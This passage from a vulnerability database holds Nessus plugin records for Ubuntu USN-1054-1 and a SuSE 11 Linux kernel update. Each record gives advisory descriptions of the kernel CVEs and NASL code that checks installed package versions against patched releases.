"AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-04-01T07:16:19", "description": "Gleb Napatov discovered that KVM did not correctly check certain\nprivileged operations. A local attacker with access to a guest kernel\ncould exploit this to crash the host system, leading to a denial of\nservice. (CVE-2010-0435)\n\nDan Rosenberg discovered that the Linux kernel TIPC implementation\ncontained multiple integer signedness errors. A local attacker could\nexploit this to gain root privileges. (CVE-2010-3859)\n\nDan Rosenberg discovered that the Linux kernel X.25 implementation\nincorrectly parsed facilities. A remote attacker could exploit this to\ncrash the kernel, leading to a denial of service. (CVE-2010-3873)\n\nDan Rosenberg discovered that the CAN protocol on 64bit systems did\nnot correctly calculate the size of certain buffers. A local attacker\ncould exploit this to crash the system or possibly execute arbitrary\ncode as the root user. (CVE-2010-3874)\n\nVasiliy Kulikov discovered that kvm did not correctly clear memory. A\nlocal attacker could exploit this to read portions of the kernel\nstack, leading to a loss of privacy. (CVE-2010-3881)\n\nDan Rosenberg discovered that IPC structures were not correctly\ninitialized on 64bit systems. A local attacker could exploit this to\nread kernel stack memory, leading to a loss of privacy.\n(CVE-2010-4073)\n\nDan Rosenberg discovered that the ivtv V4L driver did not correctly\ninitialize certian structures. A local attacker could exploit this to\nread kernel stack memory, leading to a loss of privacy.\n(CVE-2010-4079)\n\nDan Rosenberg discovered that the semctl syscall did not correctly\nclear kernel memory. A local attacker could exploit this to read\nkernel stack memory, leading to a loss of privacy. (CVE-2010-4083)\n\nDan Rosenberg discovered that the socket filters did not correctly\ninitialize structure memory. A local attacker could create malicious\nfilters to read portions of kernel stack memory, leading to a loss of\nprivacy. (CVE-2010-4158)\n\nDan Rosenberg discovered that the Linux kernel L2TP implementation\ncontained multiple integer signedness errors. A local attacker could\nexploit this to to crash the kernel, or possibly gain root privileges.\n(CVE-2010-4160)\n\nDan Rosenberg discovered that certain iovec operations did not\ncalculate page counts correctly. A local attacker could exploit this\nto crash the system, leading to a denial of service. (CVE-2010-4162)\n\nDan Rosenberg discovered multiple flaws in the X.25 facilities\nparsing. If a system was using X.25, a remote attacker could exploit\nthis to crash the system, leading to a denial of service.\n(CVE-2010-4164)\n\nSteve Chen discovered that setsockopt did not correctly check MSS\nvalues. A local attacker could make a specially crafted socket call to\ncrash the system, leading to a denial of service. (CVE-2010-4165)\n\nDave Jones discovered that the mprotect system call did not correctly\nhandle merged VMAs. A local attacker could exploit this to crash the\nsystem, leading to a denial of service. (CVE-2010-4169)\n\nDan Rosenberg discovered that the RDS protocol did not correctly check\nioctl arguments. A local attacker could exploit this to crash the\nsystem, leading to a denial of service. (CVE-2010-4175)\n\nBrad Spengler discovered that the kernel did not correctly account for\nuserspace memory allocations during exec() calls. A local attacker\ncould exploit this to consume all system memory, leading to a denial\nof service. (CVE-2010-4243)\n\nVegard Nossum discovered that memory garbage collection was not\nhandled correctly for active sockets. A local attacker could exploit\nthis to allocate all available kernel memory, leading to a denial of\nservice. (CVE-2010-4249)\n\nIt was discovered that named pipes did not correctly handle certain\nfcntl calls. A local attacker could exploit this to crash the system,\nleading to a denial of service. (CVE-2010-4256)\n\nNelson Elhage discovered that the kernel did not correctly handle\nprocess cleanup after triggering a recoverable kernel bug. If a local\nattacker were able to trigger certain kinds of kernel bugs, they could\ncreate a specially crafted process to gain root privileges.\n(CVE-2010-4258).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2011-02-02T00:00:00", "title": "Ubuntu 10.04 LTS / 10.10 : linux, linux-ec2 vulnerabilities (USN-1054-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4073", "CVE-2010-4165", "CVE-2010-3881", "CVE-2010-4083", "CVE-2010-0435", "CVE-2010-3859", "CVE-2010-4169", "CVE-2010-4158", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-4243", "CVE-2010-4079", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4160", "CVE-2010-4164", "CVE-2010-4256", "CVE-2010-3873", "CVE-2010-4175"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-libc-dev", "p-cpe:/a:canonical:ubuntu_linux:linux-doc", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6", "p-cpe:/a:canonical:ubuntu_linux:linux-tools-2.6", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-preempt", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-ec2-source-2.6.32", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-ec2", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic", "cpe:/o:canonical:ubuntu_linux:10.10", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.35", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-versatile", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ec2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.32", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-preempt", "p-cpe:/a:canonical:ubuntu_linux:linux-ec2-doc", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-tools-common", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-server", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpia", "p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386"], "id": "UBUNTU_USN-1054-1.NASL", "href": "https://www.tenable.com/plugins/nessus/51847", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1054-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51847);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:26\");\n\n script_cve_id(\"CVE-2010-0435\", \"CVE-2010-3859\", \"CVE-2010-3873\", \"CVE-2010-3874\", \"CVE-2010-3881\", \"CVE-2010-4073\", \"CVE-2010-4079\", \"CVE-2010-4083\", \"CVE-2010-4158\", \"CVE-2010-4160\", \"CVE-2010-4162\", \"CVE-2010-4164\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4175\", \"CVE-2010-4243\", \"CVE-2010-4249\", \"CVE-2010-4256\", \"CVE-2010-4258\");\n script_xref(name:\"USN\", value:\"1054-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 10.10 : linux, linux-ec2 vulnerabilities (USN-1054-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Gleb Napatov discovered that KVM did not correctly check certain\nprivileged operations. A local attacker with access to a guest kernel\ncould exploit this to crash the host system, leading to a denial of\nservice. (CVE-2010-0435)\n\nDan Rosenberg discovered that the Linux kernel TIPC implementation\ncontained multiple integer signedness errors. A local attacker could\nexploit this to gain root privileges. (CVE-2010-3859)\n\nDan Rosenberg discovered that the Linux kernel X.25 implementation\nincorrectly parsed facilities. A remote attacker could exploit this to\ncrash the kernel, leading to a denial of service. (CVE-2010-3873)\n\nDan Rosenberg discovered that the CAN protocol on 64bit systems did\nnot correctly calculate the size of certain buffers. A local attacker\ncould exploit this to crash the system or possibly execute arbitrary\ncode as the root user. (CVE-2010-3874)\n\nVasiliy Kulikov discovered that kvm did not correctly clear memory. A\nlocal attacker could exploit this to read portions of the kernel\nstack, leading to a loss of privacy. (CVE-2010-3881)\n\nDan Rosenberg discovered that IPC structures were not correctly\ninitialized on 64bit systems. A local attacker could exploit this to\nread kernel stack memory, leading to a loss of privacy.\n(CVE-2010-4073)\n\nDan Rosenberg discovered that the ivtv V4L driver did not correctly\ninitialize certian structures. A local attacker could exploit this to\nread kernel stack memory, leading to a loss of privacy.\n(CVE-2010-4079)\n\nDan Rosenberg discovered that the semctl syscall did not correctly\nclear kernel memory. A local attacker could exploit this to read\nkernel stack memory, leading to a loss of privacy. (CVE-2010-4083)\n\nDan Rosenberg discovered that the socket filters did not correctly\ninitialize structure memory. A local attacker could create malicious\nfilters to read portions of kernel stack memory, leading to a loss of\nprivacy. (CVE-2010-4158)\n\nDan Rosenberg discovered that the Linux kernel L2TP implementation\ncontained multiple integer signedness errors. A local attacker could\nexploit this to to crash the kernel, or possibly gain root privileges.\n(CVE-2010-4160)\n\nDan Rosenberg discovered that certain iovec operations did not\ncalculate page counts correctly. A local attacker could exploit this\nto crash the system, leading to a denial of service. (CVE-2010-4162)\n\nDan Rosenberg discovered multiple flaws in the X.25 facilities\nparsing. If a system was using X.25, a remote attacker could exploit\nthis to crash the system, leading to a denial of service.\n(CVE-2010-4164)\n\nSteve Chen discovered that setsockopt did not correctly check MSS\nvalues. A local attacker could make a specially crafted socket call to\ncrash the system, leading to a denial of service. (CVE-2010-4165)\n\nDave Jones discovered that the mprotect system call did not correctly\nhandle merged VMAs. A local attacker could exploit this to crash the\nsystem, leading to a denial of service. (CVE-2010-4169)\n\nDan Rosenberg discovered that the RDS protocol did not correctly check\nioctl arguments. A local attacker could exploit this to crash the\nsystem, leading to a denial of service. (CVE-2010-4175)\n\nBrad Spengler discovered that the kernel did not correctly account for\nuserspace memory allocations during exec() calls. A local attacker\ncould exploit this to consume all system memory, leading to a denial\nof service. (CVE-2010-4243)\n\nVegard Nossum discovered that memory garbage collection was not\nhandled correctly for active sockets. A local attacker could exploit\nthis to allocate all available kernel memory, leading to a denial of\nservice. (CVE-2010-4249)\n\nIt was discovered that named pipes did not correctly handle certain\nfcntl calls. A local attacker could exploit this to crash the system,\nleading to a denial of service. (CVE-2010-4256)\n\nNelson Elhage discovered that the kernel did not correctly handle\nprocess cleanup after triggering a recoverable kernel bug. If a local\nattacker were able to trigger certain kinds of kernel bugs, they could\ncreate a specially crafted process to gain root privileges.\n(CVE-2010-4258).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1054-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-ec2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-ec2-source-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-preempt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpia\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-preempt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.35\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-tools-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-tools-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/08/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. / NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|10\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 10.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2010-0435\", \"CVE-2010-3859\", \"CVE-2010-3873\", \"CVE-2010-3874\", \"CVE-2010-3881\", \"CVE-2010-4073\", \"CVE-2010-4079\", \"CVE-2010-4083\", \"CVE-2010-4158\", \"CVE-2010-4160\", \"CVE-2010-4162\", \"CVE-2010-4164\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4175\", \"CVE-2010-4243\", \"CVE-2010-4249\", \"CVE-2010-4256\", \"CVE-2010-4258\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1054-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-doc\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-ec2-doc\", pkgver:\"2.6.32-312.24\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-ec2-source-2.6.32\", pkgver:\"2.6.32-312.24\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-headers-2.6.32-28\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-headers-2.6.32-28-386\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-headers-2.6.32-28-generic\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-headers-2.6.32-28-generic-pae\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-headers-2.6.32-28-preempt\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-headers-2.6.32-28-server\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-headers-2.6.32-312\", pkgver:\"2.6.32-312.24\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-headers-2.6.32-312-ec2\", pkgver:\"2.6.32-312.24\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-28-386\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-28-generic\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-28-generic-pae\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-28-lpia\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-28-preempt\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-28-server\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-28-versatile\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-28-virtual\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-312-ec2\", pkgver:\"2.6.32-312.24\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-source-2.6.32\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-tools-2.6.32-28\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-tools-common\", pkgver:\"2.6.32-28.55\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-doc\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-headers-2.6.35-25\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-headers-2.6.35-25-generic\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-headers-2.6.35-25-generic-pae\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-headers-2.6.35-25-server\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-headers-2.6.35-25-virtual\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-image-2.6.35-25-generic\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-image-2.6.35-25-generic-pae\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-image-2.6.35-25-server\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-image-2.6.35-25-versatile\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-image-2.6.35-25-virtual\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.35-1025.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-source-2.6.35\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-tools-2.6.35-25\", pkgver:\"2.6.35-25.44\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"linux-tools-common\", pkgver:\"2.6.35-25.44\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-doc / linux-ec2-doc / linux-ec2-source-2.6.32 / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-20T14:40:15", "description": "The SUSE Linux Enterprise 11 Service Pack 1 kernel was updated to\n2.6.32.27 and fixes various bugs and security issues.\n\nThe following security issues were fixed :\n\n - A local attacker could use a Oops (kernel crash) caused\n by other flaws to write a 0 byte to a attacker\n controlled address in the kernel. This could lead to\n privilege escalation together with other issues.\n (CVE-2010-4258)\n\n - A overflow in sendto() and recvfrom() routines was fixed\n that could be used by local attackers to potentially\n crash the kernel using some socket families like L2TP.\n (CVE-2010-4160)\n\n - A 32bit vs 64bit integer mismatch in gdth_ioctl_alloc\n could lead to memory corruption in the GDTH driver.\n (CVE-2010-4157)\n\n - The do_tcp_setsockopt function in net/ipv4/tcp.c in the\n Linux kernel did not properly restrict TCP_MAXSEG (aka\n MSS) values, which allowed local users to cause a denial\n of service (OOPS) via a setsockopt call that specifies a\n small value, leading to a divide-by-zero error or\n incorrect use of a signed integer. (CVE-2010-4165)\n\n - A remote (or local) attacker communicating over X.25\n could cause a kernel panic by attempting to negotiate\n malformed facilities. (CVE-2010-4164)\n\n - A local attacker could cause memory overruns in the RDS\n protocol stack, potentially crashing the kernel. So far\n it is considered not to be exploitable. (CVE-2010-4175)\n\n - Use-after-free vulnerability in mm/mprotect.c in the\n Linux kernel allwed local users to cause a denial of\n service via vectors involving an mprotect system call.\n (CVE-2010-4169)\n\n - A minor heap overflow in the CAN network module was\n fixed. Due to nature of the memory allocator it is\n likely not exploitable. (CVE-2010-3874)\n\n - A memory information leak in berkely packet filter rules\n allowed local attackers to read uninitialized memory of\n the kernel stack. (CVE-2010-4158)\n\n - A local denial of service in the blockdevice layer was\n fixed. (CVE-2010-4162)\n\n - By submitting certain I/O requests with 0 length, a\n local user could have caused a kernel panic.\n (CVE-2010-4163)\n\n - The ethtool_get_rxnfc function in net/core/ethtool.c in\n the Linux kernel did not initialize a certain block of\n heap memory, which allowed local users to obtain\n potentially sensitive information via an\n ETHTOOL_GRXCLSRLALL ethtool command with a large\n info.rule_cnt value. (CVE-2010-3861)\n\n - arch/x86/kvm/x86.c in the Linux kernel did not\n initialize certain structure members, which allowed\n local users to obtain potentially sensitive information\n from kernel stack memory via read operations on the\n /dev/kvm device. (CVE-2010-3881)\n\n - A range checking overflow in pktcdvd ioctl was fixed.\n (CVE-2010-3437)\n\n - The viafb_ioctl_get_viafb_info function in\n drivers/video/via/ioctl.c in the Linux kernel did not\n properly initialize a certain structure member, which\n allowed local users to obtain potentially sensitive\n information from kernel stack memory via a\n VIAFB_GET_INFO ioctl call. (CVE-2010-4082)\n\n - The ipc subsystem in the Linux kernel did not initialize\n certain structures, which allowed local users to obtain\n potentially sensitive information from kernel stack\n memory via vectors related to the (1) compat_sys_semctl,\n (2) compat_sys_msgctl, and (3) compat_sys_shmctl\n functions in ipc/compat.c; and the (4)\n compat_sys_mq_open and (5) compat_sys_mq_getsetattr\n functions in ipc/compat_mq.c. (CVE-2010-4073)\n\n - The copy_shmid_to_user function in ipc/shm.c in the\n Linux kernel did not initialize a certain structure,\n which allowed local users to obtain potentially\n sensitive information from kernel stack memory via\n vectors related to the shmctl system call and the 'old\n shm interface.'. (CVE-2010-4072)\n\n - The copy_semid_to_user function in ipc/sem.c in the\n Linux kernel did not initialize a certain structure,\n which allowed local users to obtain potentially\n sensitive information from kernel stack memory via a (1)\n IPC_INFO, (2) SEM_INFO, (3) IPC_STAT, or (4) SEM_STAT\n command in a semctl system call. (CVE-2010-4083)", "edition": 25, "published": "2011-01-21T00:00:00", "title": "SuSE 11.1 Security Update : Linux kernel (SAT Patch Numbers 3760 / 3762 / 3763)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4163", "CVE-2010-4073", "CVE-2010-4165", "CVE-2010-4072", "CVE-2010-3881", "CVE-2010-3437", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-4169", "CVE-2010-4158", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-3874", "CVE-2010-4157", "CVE-2010-4160", "CVE-2010-4164", "CVE-2010-4175", "CVE-2010-3861"], "modified": "2011-01-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:11:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:11:kernel-source", "p-cpe:/a:novell:suse_linux:11:kernel-ec2", "p-cpe:/a:novell:suse_linux:11:kernel-trace-base", "p-cpe:/a:novell:suse_linux:11:kernel-default-base", "p-cpe:/a:novell:suse_linux:11:hyper-v-kmp-default", "p-cpe:/a:novell:suse_linux:11:btrfs-kmp-xen", "p-cpe:/a:novell:suse_linux:11:kernel-pae-base", "p-cpe:/a:novell:suse_linux:11:kernel-pae", "p-cpe:/a:novell:suse_linux:11:ext4dev-kmp-xen", "p-cpe:/a:novell:suse_linux:11:kernel-xen-base", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:kernel-xen", "p-cpe:/a:novell:suse_linux:11:kernel-trace", "p-cpe:/a:novell:suse_linux:11:btrfs-kmp-default", "p-cpe:/a:novell:suse_linux:11:hyper-v-kmp-pae", "p-cpe:/a:novell:suse_linux:11:kernel-syms", "p-cpe:/a:novell:suse_linux:11:kernel-desktop-devel", "p-cpe:/a:novell:suse_linux:11:btrfs-kmp-pae", "p-cpe:/a:novell:suse_linux:11:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:11:kernel-pae-extra", "p-cpe:/a:novell:suse_linux:11:kernel-xen-extra", "p-cpe:/a:novell:suse_linux:11:kernel-default-devel", "p-cpe:/a:novell:suse_linux:11:kernel-default-man", "p-cpe:/a:novell:suse_linux:11:kernel-default-extra", "p-cpe:/a:novell:suse_linux:11:kernel-default", "p-cpe:/a:novell:suse_linux:11:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:11:ext4dev-kmp-pae", "p-cpe:/a:novell:suse_linux:11:ext4dev-kmp-default"], "id": "SUSE_11_KERNEL-110104.NASL", "href": "https://www.tenable.com/plugins/nessus/51614", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51614);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-3437\", \"CVE-2010-3861\", \"CVE-2010-3874\", \"CVE-2010-3881\", \"CVE-2010-4072\", \"CVE-2010-4073\", \"CVE-2010-4082\", \"CVE-2010-4083\", 